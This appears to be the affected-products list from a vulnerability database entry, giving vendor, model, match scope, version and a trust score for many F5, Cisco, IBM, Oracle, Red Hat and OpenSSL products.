vendor:	ibm	model:	security guardium	scope:	eq	version:	9	Trust: 0.3
vendor:	oracle	model:	mysql	scope:	eq	version:	5.6.8	Trust: 0.3
vendor:	f5	model:	big-ip afm	scope:	eq	version:	13.1	Trust: 0.3
vendor:	f5	model:	big-ip afm	scope:	ne	version:	13.0.1	Trust: 0.3
vendor:	cisco	model:	mediasense	scope:	eq	version:	0	Trust: 0.3
vendor:	oracle	model:	mysql workbench	scope:	eq	version:	6.1.5	Trust: 0.3
vendor:	f5	model:	big-iq security	scope:	eq	version:	4.5	Trust: 0.3
vendor:	cisco	model:	video surveillance series high-definition ip cameras	scope:	eq	version:	40000	Trust: 0.3
vendor:	cisco	model:	jabber for android	scope:	ne	version:	11.8	Trust: 0.3
vendor:	ibm	model:	sonas	scope:	eq	version:	1.5.2.2	Trust: 0.3
vendor:	cisco	model:	anyconnect secure mobility client for desktop platforms	scope:	ne	version:	4.3.4	Trust: 0.3
vendor:	redhat	model:	enterprise linux for arm	scope:	eq	version:	647	Trust: 0.3
vendor:	netapp	model:	system setup	scope:	eq	version:	0	Trust: 0.3
vendor:	hp	model:	integrated lights-out	scope:	eq	version:	42.22	Trust: 0.3
vendor:	pexip	model:	infinity	scope:	eq	version:	12	Trust: 0.3
vendor:	f5	model:	big-ip link controller	scope:	eq	version:	11.5.5	Trust: 0.3
vendor:	ibm	model:	security guardium	scope:	eq	version:	10	Trust: 0.3
vendor:	ibm	model:	sdk for node.js	scope:	eq	version:	4.4.1.0	Trust: 0.3
vendor:	hp	model:	performance center	scope:	eq	version:	11.52	Trust: 0.3
vendor:	f5	model:	big-ip gtm	scope:	eq	version:	11.5.6	Trust: 0.3
vendor:	cisco	model:	video surveillance series ip cameras	scope:	ne	version:	30002.9	Trust: 0.3
vendor:	cisco	model:	series digital media players 5.3.6 rb3	scope:	ne	version:	4400	Trust: 0.3
vendor:	oracle	model:	mysql	scope:	eq	version:	5.6.20	Trust: 0.3
vendor:	f5	model:	big-ip afm	scope:	eq	version:	13.0	Trust: 0.3
vendor:	oracle	model:	mysql workbench	scope:	eq	version:	6.3.8	Trust: 0.3
vendor:	f5	model:	big-ip dns	scope:	eq	version:	12.0	Trust: 0.3
vendor:	ibm	model:	cognos metrics manager	scope:	eq	version:	10.2	Trust: 0.3
vendor:	ibm	model:	sdk for node.js	scope:	eq	version:	1.2.0.10	Trust: 0.3
vendor:	cisco	model:	stealthwatch identity	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	aironet series access points	scope:	ne	version:	270016.2	Trust: 0.3
vendor:	ibm	model:	sonas	scope:	eq	version:	1.5.2.1	Trust: 0.3
vendor:	f5	model:	big-ip asm	scope:	eq	version:	11.5.4	Trust: 0.3
vendor:	f5	model:	big-ip analytics hf1	scope:	ne	version:	12.1.2	Trust: 0.3
vendor:	redhat	model:	enterprise linux server update services for sap solutions	scope:	eq	version:	-7.	Trust: 0.3
vendor:	ibm	model:	db2® enterprise server edition	scope:	eq	version:	10.5	Trust: 0.3
vendor:	ibm	model:	sdk for node.js	scope:	eq	version:	4.3.1.0	Trust: 0.3
vendor:	f5	model:	big-ip asm	scope:	ne	version:	13.0.1	Trust: 0.3
vendor:	cisco	model:	application policy infrastructure controller	scope:	ne	version:	2.2(1)	Trust: 0.3
vendor:	hp	model:	loadrunner	scope:	eq	version:	9.52	Trust: 0.3
vendor:	ibm	model:	tivoli storage productivity center	scope:	eq	version:	5.2.2	Trust: 0.3
vendor:	f5	model:	big-iq security	scope:	eq	version:	4.4	Trust: 0.3
vendor:	f5	model:	big-ip pem	scope:	eq	version:	12.1.0	Trust: 0.3
vendor:	f5	model:	big-ip ltm	scope:	eq	version:	12.0	Trust: 0.3
vendor:	redhat	model:	enterprise linux for power little endian extended update supp	scope:	eq	version:	-7.6	Trust: 0.3
vendor:	ibm	model:	storwize unified	scope:	eq	version:	v70001.5.1.0	Trust: 0.3
vendor:	f5	model:	big-ip ltm	scope:	eq	version:	11.4.1	Trust: 0.3
vendor:	f5	model:	big-ip edge gateway	scope:	eq	version:	10.2.4	Trust: 0.3
vendor:	cisco	model:	aironet series access points	scope:	ne	version:	270016.1	Trust: 0.3
vendor:	redhat	model:	enterprise linux eus compute node	scope:	eq	version:	7.5	Trust: 0.3
vendor:	f5	model:	big-ip apm	scope:	eq	version:	11.5.1	Trust: 0.3
vendor:	hp	model:	performance center	scope:	eq	version:	12.0	Trust: 0.3
vendor:	cisco	model:	show and share	scope:	eq	version:	0	Trust: 0.3
vendor:	f5	model:	big-ip apm	scope:	eq	version:	12.1.2	Trust: 0.3
vendor:	cisco	model:	unified workforce optimization quality management solution 11.5 su1	scope:	ne	version:	-	Trust: 0.3
vendor:	f5	model:	big-ip wom	scope:	eq	version:	10.2.2	Trust: 0.3
vendor:	oracle	model:	mysql	scope:	eq	version:	5.6.2	Trust: 0.3
vendor:	ibm	model:	rrdi	scope:	eq	version:	2.0.5	Trust: 0.3
vendor:	pexip	model:	infinity	scope:	eq	version:	11.1	Trust: 0.3
vendor:	hp	model:	loadrunner patch	scope:	eq	version:	12.022	Trust: 0.3
vendor:	ibm	model:	tivoli provisioning manager for images	scope:	eq	version:	7.1.1.19	Trust: 0.3
vendor:	f5	model:	big-ip ltm	scope:	eq	version:	11.5.5	Trust: 0.3
vendor:	cisco	model:	universal small cell iuh	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	ucs director	scope:	eq	version:	0	Trust: 0.3
vendor:	ibm	model:	tivoli provisioning manager for images build	scope:	eq	version:	7.1.1.20280.6	Trust: 0.3
vendor:	f5	model:	big-ip websafe	scope:	ne	version:	12.1.3	Trust: 0.3
vendor:	pexip	model:	infinity	scope:	ne	version:	13	Trust: 0.3
vendor:	f5	model:	big-ip asm	scope:	eq	version:	11.6.1	Trust: 0.3
vendor:	f5	model:	big-ip aam	scope:	eq	version:	11.5.3	Trust: 0.3
vendor:	ibm	model:	sdk for node.js	scope:	eq	version:	1.1.0.3	Trust: 0.3
vendor:	cisco	model:	jabber client framework components	scope:	ne	version:	11.8	Trust: 0.3
vendor:	hp	model:	performance center patch	scope:	eq	version:	12.534	Trust: 0.3
vendor:	cisco	model:	telepresence isdn link	scope:	eq	version:	0	Trust: 0.3
vendor:	f5	model:	big-ip pem	scope:	eq	version:	12.1.3	Trust: 0.3
vendor:	cisco	model:	webex meetings client on-premises t32	scope:	ne	version:	-	Trust: 0.3
vendor:	cisco	model:	telepresence profile series tc7.3.7	scope:	ne	version:	-	Trust: 0.3
vendor:	f5	model:	big-ip apm hf1	scope:	ne	version:	13.0	Trust: 0.3
vendor:	cisco	model:	dcm series d9900 digital content manager	scope:	ne	version:	0	Trust: 0.3
vendor:	cisco	model:	nexus series switches	scope:	ne	version:	70006.2.19	Trust: 0.3
vendor:	oracle	model:	commerce guided search	scope:	eq	version:	6.5.1	Trust: 0.3
vendor:	f5	model:	traffix sdc	scope:	eq	version:	4.4	Trust: 0.3
vendor:	cisco	model:	unified attendant console business edition	scope:	eq	version:	0	Trust: 0.3
vendor:	ibm	model:	communications server for aix	scope:	eq	version:	6.4	Trust: 0.3
vendor:	redhat	model:	enterprise linux for ibm z systems	scope:	eq	version:	7	Trust: 0.3
vendor:	mcafee	model:	epolicy orchestrator	scope:	eq	version:	5.3.1	Trust: 0.3
vendor:	f5	model:	big-ip aam	scope:	eq	version:	11.5.1	Trust: 0.3
vendor:	ibm	model:	storwize unified	scope:	eq	version:	v70001.5.2.3	Trust: 0.3
vendor:	openssl	model:	project openssl 1.0.2i	scope:	ne	version:	-	Trust: 0.3
vendor:	ibm	model:	sdk for node.js	scope:	eq	version:	1.1.0.14	Trust: 0.3
vendor:	f5	model:	iworkflow	scope:	eq	version:	2.3	Trust: 0.3
vendor:	cisco	model:	aironet series access points	scope:	ne	version:	270016.4	Trust: 0.3
vendor:	ibm	model:	bigfix remote control	scope:	eq	version:	9.1.2	Trust: 0.3
vendor:	ibm	model:	powerkvm	scope:	eq	version:	2.1	Trust: 0.3
vendor:	f5	model:	big-ip pem	scope:	eq	version:	11.5	Trust: 0.3
vendor:	cisco	model:	mds series multilayer switches	scope:	eq	version:	90000	Trust: 0.3
vendor:	cisco	model:	prime network services controller 1.01u	scope:	ne	version:	-	Trust: 0.3
vendor:	ibm	model:	sdk for node.js	scope:	eq	version:	1.2.0.12	Trust: 0.3
vendor:	f5	model:	big-ip apm	scope:	eq	version:	11.6.0	Trust: 0.3
vendor:	oracle	model:	oss support tools	scope:	eq	version:	8.9.15.9.8	Trust: 0.3
vendor:	python	model:	software foundation python	scope:	eq	version:	3.4.1	Trust: 0.3
vendor:	f5	model:	big-ip wom	scope:	eq	version:	11.2.1	Trust: 0.3
vendor:	cisco	model:	firesight system software	scope:	ne	version:	5.4.0.10	Trust: 0.3
vendor:	ibm	model:	worklight consumer edition	scope:	eq	version:	6.1.0.0	Trust: 0.3
vendor:	cisco	model:	universal small cell series	scope:	eq	version:	50000	Trust: 0.3
vendor:	cisco	model:	nexus series switches 5.2 sv3	scope:	ne	version:	1000v	Trust: 0.3
vendor:	ibm	model:	communications server for windows	scope:	eq	version:	6.4	Trust: 0.3
vendor:	cisco	model:	telepresence system tx1310	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	unified communications domain manager	scope:	eq	version:	0	Trust: 0.3
vendor:	f5	model:	big-ip gtm	scope:	eq	version:	10.2.3	Trust: 0.3
vendor:	cisco	model:	telepresence server on multiparty media and	scope:	ne	version:	3103204.4	Trust: 0.3
vendor:	ibm	model:	db2® workgroup server edition	scope:	eq	version:	9.7	Trust: 0.3
vendor:	ibm	model:	rrdi	scope:	eq	version:	5.0.2	Trust: 0.3
vendor:	ibm	model:	rational insight	scope:	eq	version:	1.1.1.4	Trust: 0.3
vendor:	ibm	model:	tivoli provisioning manager for os deployment build	scope:	ne	version:	5.1.1051.08	Trust: 0.3
vendor:	ibm	model:	security network protection	scope:	eq	version:	5.3.1.10	Trust: 0.3
vendor:	openssl	model:	project openssl 1.0.2h	scope:	-	version:	-	Trust: 0.3
vendor:	ibm	model:	db2 direct standard edition	scope:	eq	version:	9.7	Trust: 0.3
vendor:	cisco	model:	nac guest server	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	enterprise content delivery system	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	email security appliance	scope:	eq	version:	0	Trust: 0.3
vendor:	ibm	model:	security network protection	scope:	eq	version:	5.3.1	Trust: 0.3
vendor:	ibm	model:	cognos business intelligence server	scope:	eq	version:	10.2.11	Trust: 0.3
vendor:	f5	model:	linerate	scope:	eq	version:	2.6	Trust: 0.3
vendor:	cisco	model:	anyconnect secure mobility client for linux	scope:	eq	version:	0	Trust: 0.3
vendor:	ibm	model:	security network protection	scope:	eq	version:	5.3.1.1	Trust: 0.3
vendor:	f5	model:	big-ip ltm	scope:	eq	version:	11.5.7	Trust: 0.3
vendor:	ibm	model:	db2® connect? enterprise edition	scope:	eq	version:	9.7	Trust: 0.3
vendor:	cisco	model:	telepresence system ex series	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	prime collaboration deployment	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	webex business suite	scope:	eq	version:	0	Trust: 0.3
vendor:	f5	model:	big-ip asm	scope:	eq	version:	11.5.3	Trust: 0.3
vendor:	cisco	model:	dx series ip phones	scope:	eq	version:	0	Trust: 0.3
vendor:	f5	model:	big-ip afm	scope:	ne	version:	14.0	Trust: 0.3
vendor:	cisco	model:	telepresence system ex series tc7.3.7	scope:	ne	version:	-	Trust: 0.3
vendor:	ibm	model:	db2® advanced enterprise server edition	scope:	eq	version:	9.7	Trust: 0.3
vendor:	cisco	model:	ios and cisco ios xe software	scope:	ne	version:	15.5(3)	Trust: 0.3
vendor:	oracle	model:	vm virtualbox	scope:	eq	version:	5.0.18	Trust: 0.3
vendor:	ibm	model:	java sdk	scope:	eq	version:	7.1.3.60	Trust: 0.3
vendor:	cisco	model:	anyconnect secure mobility client for android	scope:	eq	version:	0	Trust: 0.3
vendor:	f5	model:	big-ip dns	scope:	eq	version:	13.1	Trust: 0.3
vendor:	ibm	model:	sdk for node.js	scope:	eq	version:	1.1.0.19	Trust: 0.3
vendor:	cisco	model:	nexus series blade switches	scope:	eq	version:	40000	Trust: 0.3
vendor:	ibm	model:	java sdk	scope:	eq	version:	8.0.3.22	Trust: 0.3
vendor:	redhat	model:	enterprise linux desktop	scope:	eq	version:	7	Trust: 0.3
vendor:	f5	model:	big-iq device	scope:	eq	version:	4.3	Trust: 0.3
vendor:	ibm	model:	sdk for node.js	scope:	eq	version:	4.5.0.0	Trust: 0.3
vendor:	ibm	model:	sterling connect:express for unix	scope:	eq	version:	1.5.0.11	Trust: 0.3
vendor:	cisco	model:	telepresence system	scope:	ne	version:	500-376.1	Trust: 0.3
vendor:	f5	model:	big-ip link controller	scope:	eq	version:	11.4	Trust: 0.3
vendor:	f5	model:	big-ip apm	scope:	eq	version:	12.0	Trust: 0.3
vendor:	cisco	model:	jabber for windows	scope:	ne	version:	11.8	Trust: 0.3
vendor:	f5	model:	big-ip apm	scope:	eq	version:	11.4.1	Trust: 0.3
vendor:	cisco	model:	telepresence profile series ce8.2.2	scope:	ne	version:	-	Trust: 0.3
vendor:	oracle	model:	enterprise manager base platform	scope:	eq	version:	13.1.0.0	Trust: 0.3
vendor:	f5	model:	big-ip aam	scope:	eq	version:	11.4.0	Trust: 0.3
vendor:	f5	model:	big-ip asm	scope:	ne	version:	14.0	Trust: 0.3
vendor:	oracle	model:	mysql	scope:	eq	version:	5.6.10	Trust: 0.3
vendor:	f5	model:	big-ip afm	scope:	eq	version:	11.5.3	Trust: 0.3
vendor:	cisco	model:	ace30 application control engine module	scope:	eq	version:	0	Trust: 0.3
vendor:	oracle	model:	vm virtualbox	scope:	ne	version:	5.0.28	Trust: 0.3
vendor:	cisco	model:	edge digital media player 1.6rb5	scope:	ne	version:	300	Trust: 0.3
vendor:	oracle	model:	mysql	scope:	eq	version:	5.7.12	Trust: 0.3
vendor:	cisco	model:	unified ip phone	scope:	eq	version:	69450	Trust: 0.3
vendor:	cisco	model:	telepresence isdn gateway mse	scope:	eq	version:	83210	Trust: 0.3
vendor:	f5	model:	big-ip apm	scope:	eq	version:	10.2.4	Trust: 0.3
vendor:	ibm	model:	sdk for node.js	scope:	eq	version:	4.4.0.0	Trust: 0.3
vendor:	ibm	model:	storwize unified	scope:	eq	version:	v70001.6.1.0	Trust: 0.3
vendor:	cisco	model:	jabber software development kit	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	wireless lan controller	scope:	ne	version:	8.4	Trust: 0.3
vendor:	cisco	model:	uc integration for microsoft lync	scope:	ne	version:	11.6.3	Trust: 0.3
vendor:	ibm	model:	sdk for node.js	scope:	eq	version:	4.4.5.0	Trust: 0.3
vendor:	ibm	model:	rational application developer for websphere software	scope:	eq	version:	9.1	Trust: 0.3
vendor:	cisco	model:	unified contact center enterprise	scope:	ne	version:	11.6.1	Trust: 0.3
vendor:	mcafee	model:	email gateway	scope:	eq	version:	7.6.404	Trust: 0.3
vendor:	cisco	model:	telepresence system tx1310	scope:	ne	version:	6.1	Trust: 0.3
vendor:	cisco	model:	spa112 2-port phone adapter	scope:	ne	version:	1.4.2	Trust: 0.3
vendor:	ibm	model:	tivoli provisioning manager for os deployment build	scope:	eq	version:	5.1.151.05	Trust: 0.3
vendor:	cisco	model:	connected grid routers	scope:	ne	version:	7.3	Trust: 0.3
vendor:	oracle	model:	commerce experience manager	scope:	eq	version:	6.4.1.2	Trust: 0.3
vendor:	oracle	model:	enterprise manager base platform	scope:	eq	version:	12.1	Trust: 0.3
vendor:	ibm	model:	i	scope:	eq	version:	7.3	Trust: 0.3
vendor:	hp	model:	performance center patch	scope:	eq	version:	12.01	Trust: 0.3
vendor:	f5	model:	big-ip pem	scope:	eq	version:	11.4	Trust: 0.3
vendor:	oracle	model:	mysql	scope:	eq	version:	5.6.33	Trust: 0.3
vendor:	f5	model:	big-ip aam	scope:	eq	version:	12.0	Trust: 0.3
vendor:	f5	model:	big-ip aam	scope:	eq	version:	11.4.1	Trust: 0.3
vendor:	f5	model:	big-ip gtm	scope:	eq	version:	11.5	Trust: 0.3
vendor:	cisco	model:	telepresence mx series tc7.3.7	scope:	ne	version:	-	Trust: 0.3
vendor:	cisco	model:	ip interoperability and collaboration system	scope:	ne	version:	5.0(1)	Trust: 0.3
vendor:	f5	model:	big-ip asm	scope:	eq	version:	12.1.1	Trust: 0.3
vendor:	f5	model:	big-ip webaccelerator	scope:	eq	version:	10.2.2	Trust: 0.3
vendor:	f5	model:	big-ip aam	scope:	eq	version:	11.5.5	Trust: 0.3
vendor:	cisco	model:	spa122 analog telephone adapter with router	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	universal small cell series	scope:	ne	version:	50003.5.12.23	Trust: 0.3
vendor:	cisco	model:	universal small cell series	scope:	eq	version:	50003.4.2.0	Trust: 0.3
vendor:	cisco	model:	connected grid routers	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	uc integration for microsoft lync	scope:	eq	version:	0	Trust: 0.3
vendor:	ibm	model:	security guardium	scope:	eq	version:	10.0.1	Trust: 0.3
vendor:	f5	model:	big-ip link controller	scope:	eq	version:	11.5.2	Trust: 0.3
vendor:	ibm	model:	openssh for gpfs for windows	scope:	eq	version:	3.5	Trust: 0.3
vendor:	ibm	model:	db2® direct advanced edition	scope:	eq	version:	11.1	Trust: 0.3
vendor:	f5	model:	big-ip edge gateway	scope:	eq	version:	10.2.1	Trust: 0.3
vendor:	ibm	model:	db2® enterprise server edition	scope:	eq	version:	9.7	Trust: 0.3
vendor:	mcafee	model:	email gateway	scope:	eq	version:	7.6.401	Trust: 0.3
vendor:	ibm	model:	security network protection	scope:	eq	version:	5.3.1.8	Trust: 0.3
vendor:	redhat	model:	enterprise linux for power little endian extended update supp	scope:	eq	version:	-7.5	Trust: 0.3
vendor:	ibm	model:	sdk for node.js	scope:	eq	version:	1.1.0.15	Trust: 0.3
vendor:	ibm	model:	bigfix remote control	scope:	ne	version:	9.1.3	Trust: 0.3
vendor:	cisco	model:	unity express	scope:	eq	version:	0	Trust: 0.3
vendor:	redhat	model:	enterprise linux for power little endian	scope:	eq	version:	7	Trust: 0.3
vendor:	oracle	model:	mysql	scope:	eq	version:	5.6.7	Trust: 0.3
vendor:	oracle	model:	mysql	scope:	eq	version:	5.6.21	Trust: 0.3
vendor:	cisco	model:	telepresence system	scope:	eq	version:	13000	Trust: 0.3
vendor:	f5	model:	big-ip afm	scope:	eq	version:	12.1.1	Trust: 0.3
vendor:	ibm	model:	worklight enterprise edition	scope:	eq	version:	6.1.0.0	Trust: 0.3
vendor:	f5	model:	big-ip ltm	scope:	eq	version:	11.5.4	Trust: 0.3
vendor:	ibm	model:	tivoli provisioning manager for images	scope:	eq	version:	7.1.1.0	Trust: 0.3
vendor:	f5	model:	big-ip apm	scope:	eq	version:	11.5.7	Trust: 0.3
vendor:	cisco	model:	tandberg codian isdn gateway	scope:	eq	version:	0	Trust: 0.3
vendor:	mcafee	model:	email gateway 7.6.405h1165239	scope:	-	version:	-	Trust: 0.3
vendor:	cisco	model:	jabber guest	scope:	ne	version:	11	Trust: 0.3
vendor:	oracle	model:	vm virtualbox	scope:	eq	version:	5.0.9	Trust: 0.3
vendor:	f5	model:	big-ip apm hf1	scope:	ne	version:	12.1.2	Trust: 0.3
vendor:	cisco	model:	digital media manager 5.3.6 rb3	scope:	ne	version:	-	Trust: 0.3
vendor:	ibm	model:	sdk for node.js	scope:	eq	version:	4.4.4.0	Trust: 0.3
vendor:	f5	model:	big-ip webaccelerator	scope:	eq	version:	11.2.1	Trust: 0.3
vendor:	f5	model:	big-ip analytics	scope:	eq	version:	11.4	Trust: 0.3
vendor:	cisco	model:	series digital media players	scope:	eq	version:	44000	Trust: 0.3
vendor:	cisco	model:	ata series analog terminal adaptors	scope:	ne	version:	1901.3	Trust: 0.3
vendor:	cisco	model:	prime network services controller	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	ata series analog terminal adaptors	scope:	eq	version:	1900	Trust: 0.3
vendor:	cisco	model:	asr series	scope:	ne	version:	500021.2	Trust: 0.3
vendor:	openssl	model:	project openssl 1.0.1t	scope:	-	version:	-	Trust: 0.3
vendor:	f5	model:	big-ip asm	scope:	eq	version:	11.5.5	Trust: 0.3
vendor:	hp	model:	loadrunner	scope:	eq	version:	11.52	Trust: 0.3
vendor:	ibm	model:	sterling connect:express for unix	scope:	eq	version:	1.5.0.12	Trust: 0.3
vendor:	cisco	model:	ons series multiservice provisioning platforms	scope:	ne	version:	1545410.7	Trust: 0.3
vendor:	f5	model:	big-ip ltm	scope:	eq	version:	11.6.1	Trust: 0.3
vendor:	f5	model:	big-ip link controller	scope:	eq	version:	10.2.2	Trust: 0.3
vendor:	cisco	model:	telepresence system series	scope:	eq	version:	30000	Trust: 0.3
vendor:	ibm	model:	cognos metrics manager	scope:	eq	version:	10.1.1	Trust: 0.3
vendor:	f5	model:	big-ip link controller	scope:	eq	version:	11.6.2	Trust: 0.3
vendor:	f5	model:	big-ip analytics hf1	scope:	ne	version:	13.0	Trust: 0.3
vendor:	f5	model:	big-ip apm	scope:	eq	version:	13.1	Trust: 0.3
vendor:	ibm	model:	tivoli provisioning manager for os deployment	scope:	eq	version:	7.1.1.19	Trust: 0.3
vendor:	ibm	model:	security network protection	scope:	eq	version:	5.3.2.3	Trust: 0.3
vendor:	ibm	model:	worklight consumer edition	scope:	eq	version:	6.1.0.2	Trust: 0.3
vendor:	cisco	model:	hosted collaboration mediation fulfillment	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	unified communications manager session management edition	scope:	eq	version:	0	Trust: 0.3
vendor:	oracle	model:	mysql	scope:	eq	version:	5.6.19	Trust: 0.3
vendor:	ibm	model:	smartcloud entry	scope:	eq	version:	2.4.0	Trust: 0.3
vendor:	ubuntu	model:	linux lts amd64	scope:	eq	version:	12.04	Trust: 0.3
vendor:	ibm	model:	i	scope:	eq	version:	6.1	Trust: 0.3
vendor:	ibm	model:	security guardium	scope:	eq	version:	10.1.2	Trust: 0.3
vendor:	oracle	model:	mysql	scope:	eq	version:	5.6.25	Trust: 0.3
vendor:	ibm	model:	mobilefirst platform foundation	scope:	eq	version:	7.1.0.0	Trust: 0.3
vendor:	f5	model:	big-ip link controller	scope:	eq	version:	11.5.6	Trust: 0.3
vendor:	cisco	model:	webex meetings server multimedia platform	scope:	eq	version:	-0	Trust: 0.3
vendor:	cisco	model:	nexus series switches	scope:	eq	version:	70000	Trust: 0.3
vendor:	ibm	model:	rational insight	scope:	eq	version:	1.1.1.7	Trust: 0.3
vendor:	f5	model:	big-ip afm	scope:	eq	version:	11.4.1	Trust: 0.3
vendor:	cisco	model:	unified ip conference phone 10.3.1sr4	scope:	ne	version:	8831	Trust: 0.3
vendor:	cisco	model:	prime network registrar	scope:	ne	version:	8.3.5	Trust: 0.3
vendor:	ibm	model:	db2® express edition	scope:	eq	version:	9.7	Trust: 0.3
vendor:	cisco	model:	series stackable managed switches	scope:	eq	version:	5000	Trust: 0.3
vendor:	hp	model:	performance center patch	scope:	eq	version:	12.501	Trust: 0.3
vendor:	f5	model:	big-ip analytics	scope:	eq	version:	11.5.2	Trust: 0.3
vendor:	f5	model:	big-ip afm	scope:	eq	version:	11.5.5	Trust: 0.3
vendor:	cisco	model:	prime access registrar	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	unified intelligent contact management enterprise	scope:	ne	version:	11.6.1	Trust: 0.3
vendor:	cisco	model:	stealthwatch flowcollector netflow	scope:	eq	version:	0	Trust: 0.3
vendor:	hp	model:	loadrunner	scope:	eq	version:	12.0	Trust: 0.3
vendor:	mcafee	model:	email gateway	scope:	eq	version:	7.6.3.2	Trust: 0.3
vendor:	ibm	model:	sdk for node.js	scope:	eq	version:	4.4.3.0	Trust: 0.3
vendor:	cisco	model:	ucs manager	scope:	eq	version:	0	Trust: 0.3
vendor:	mcafee	model:	epolicy orchestrator	scope:	eq	version:	5.3.2	Trust: 0.3
vendor:	ibm	model:	rrdi	scope:	eq	version:	5.0.1	Trust: 0.3
vendor:	f5	model:	big-ip ltm hf1	scope:	ne	version:	12.1.2	Trust: 0.3
vendor:	oracle	model:	mysql	scope:	eq	version:	5.6.11	Trust: 0.3
vendor:	f5	model:	big-ip ltm	scope:	eq	version:	10.2.2	Trust: 0.3
vendor:	python	model:	software foundation python	scope:	eq	version:	2.7.11	Trust: 0.3
vendor:	cisco	model:	webex meetings server	scope:	eq	version:	1.0	Trust: 0.3
vendor:	cisco	model:	network analysis module	scope:	ne	version:	6.2(2)	Trust: 0.3
vendor:	cisco	model:	video surveillance 4300e and 4500e high-definition ip cameras	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	unified attendant console department edition	scope:	eq	version:	0	Trust: 0.3
vendor:	f5	model:	big-iq security	scope:	eq	version:	4.3	Trust: 0.3
vendor:	cisco	model:	ip series phones	scope:	eq	version:	78000	Trust: 0.3
vendor:	netapp	model:	oncommand api services	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	aironet series access points	scope:	eq	version:	27000	Trust: 0.3
vendor:	cisco	model:	onepk all-in-one virtual machine	scope:	eq	version:	0	Trust: 0.3
vendor:	python	model:	software foundation python	scope:	ne	version:	2.7.13	Trust: 0.3
vendor:	f5	model:	big-ip websafe	scope:	ne	version:	11.6.3	Trust: 0.3
vendor:	f5	model:	big-iq centralized management	scope:	eq	version:	5.1	Trust: 0.3
vendor:	f5	model:	big-ip psm	scope:	eq	version:	11.4	Trust: 0.3
vendor:	f5	model:	big-ip ltm	scope:	eq	version:	11.5.6	Trust: 0.3
vendor:	ibm	model:	db2 direct advanced edition	scope:	eq	version:	9.7	Trust: 0.3
vendor:	ibm	model:	storwize unified	scope:	eq	version:	v70001.6.0.1	Trust: 0.3
vendor:	cisco	model:	industrial router	scope:	eq	version:	9100	Trust: 0.3
vendor:	mcafee	model:	email gateway	scope:	eq	version:	7.6.1	Trust: 0.3
vendor:	ibm	model:	tivoli storage productivity center	scope:	eq	version:	5.2	Trust: 0.3
vendor:	ibm	model:	db2® workgroup server edition	scope:	eq	version:	10.5	Trust: 0.3
vendor:	f5	model:	big-ip dns	scope:	ne	version:	14.0	Trust: 0.3
vendor:	ibm	model:	db2 direct standard edition	scope:	eq	version:	10.5	Trust: 0.3
vendor:	cisco	model:	unified intelligence center	scope:	eq	version:	0	Trust: 0.3
vendor:	f5	model:	big-ip apm	scope:	eq	version:	11.5.4	Trust: 0.3
vendor:	f5	model:	big-ip pem	scope:	eq	version:	11.6.3	Trust: 0.3
vendor:	hp	model:	loadrunner patch	scope:	eq	version:	12.013	Trust: 0.3
vendor:	ibm	model:	security network protection	scope:	eq	version:	5.3.2	Trust: 0.3
vendor:	ibm	model:	aix	scope:	eq	version:	6.1	Trust: 0.3
vendor:	pexip	model:	infinity	scope:	eq	version:	11	Trust: 0.3
vendor:	cisco	model:	video distribution suite for internet streaming	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	telepresence system	scope:	ne	version:	13006.1	Trust: 0.3
vendor:	ibm	model:	sdk for node.js	scope:	ne	version:	6.7.0.0	Trust: 0.3
vendor:	ibm	model:	tivoli storage productivity center	scope:	eq	version:	5.2.7.1	Trust: 0.3
vendor:	redhat	model:	enterprise linux server aus	scope:	eq	version:	7.6	Trust: 0.3
vendor:	redhat	model:	enterprise linux for ibm system z	scope:	eq	version:	7	Trust: 0.3
vendor:	ibm	model:	tivoli provisioning manager for os deployment	scope:	eq	version:	5.1.116	Trust: 0.3
vendor:	cisco	model:	cloupia unified infrastructure controller	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	nexus series switches	scope:	eq	version:	50000	Trust: 0.3
vendor:	ibm	model:	db2® advanced enterprise server edition	scope:	eq	version:	10.5	Trust: 0.3
vendor:	ibm	model:	db2® connect? unlimited edition for system i®	scope:	eq	version:	9.7	Trust: 0.3
vendor:	cisco	model:	telepresence system	scope:	ne	version:	11006.1	Trust: 0.3
vendor:	f5	model:	big-ip ltm	scope:	eq	version:	11.2.1	Trust: 0.3
vendor:	cisco	model:	agent desktop for cisco unified contact center express	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	packaged contact center enterprise	scope:	eq	version:	0	Trust: 0.3
vendor:	ibm	model:	mobilefirst platform foundation	scope:	eq	version:	8.0.0.0	Trust: 0.3
vendor:	ibm	model:	smartcloud entry	scope:	eq	version:	3.1	Trust: 0.3
vendor:	cisco	model:	video surveillance series ip cameras	scope:	eq	version:	70000	Trust: 0.3
vendor:	hp	model:	loadrunner	scope:	eq	version:	11.0	Trust: 0.3
vendor:	cisco	model:	adaptive security appliance	scope:	eq	version:	0	Trust: 0.3
vendor:	redhat	model:	enterprise linux for ibm z systems extended update support	scope:	eq	version:	-7.6	Trust: 0.3
vendor:	oracle	model:	secure global desktop	scope:	eq	version:	5.2	Trust: 0.3
vendor:	cisco	model:	telepresence sx series tc7.3.7	scope:	ne	version:	-	Trust: 0.3
vendor:	ibm	model:	cognos metrics manager	scope:	eq	version:	10.2.1	Trust: 0.3
vendor:	ibm	model:	tivoli storage productivity center	scope:	eq	version:	5.2.5	Trust: 0.3
vendor:	f5	model:	big-ip dns	scope:	eq	version:	12.1.1	Trust: 0.3
vendor:	f5	model:	big-ip aam	scope:	eq	version:	11.5.4	Trust: 0.3
vendor:	ibm	model:	db2® connect? application server edition	scope:	eq	version:	10.1	Trust: 0.3
vendor:	f5	model:	big-ip apm	scope:	eq	version:	11.6.1	Trust: 0.3
